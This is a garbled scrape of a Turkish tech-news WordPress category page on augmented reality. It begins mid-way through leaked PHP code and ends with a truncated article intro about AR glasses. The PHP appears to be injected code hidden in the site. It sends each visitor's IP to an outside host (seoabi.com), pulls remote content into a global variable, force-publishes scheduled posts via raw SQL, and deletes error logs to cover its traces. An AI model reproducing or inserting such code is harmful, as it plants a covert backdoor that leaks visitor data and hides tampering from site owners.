$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> augnnnnnnnnmented reality | Teknoloji Haberleri

augnnnnnnnnmented reality kategorisindeki tüm yazılar

Son Yazılar

Artırılmış Gerçeklik ve Gözlükler

Google’ın bir şaka gibi ortaya çıkan özel gözlüğü, artırılmış gerçekliğin nereye doğru gittiğini gösteren somut bir örnek. Peki bu örnek ne kadar gelişecek ve hayatımızda yerini alacak mı? Son zamanlarda “Augmented Reality” terimini veya onun kısaltması olan AR’yi sık görmüş veya duymuş olmalısınız. “Artırılmış Gerçeklik” olarak Türkçe’ye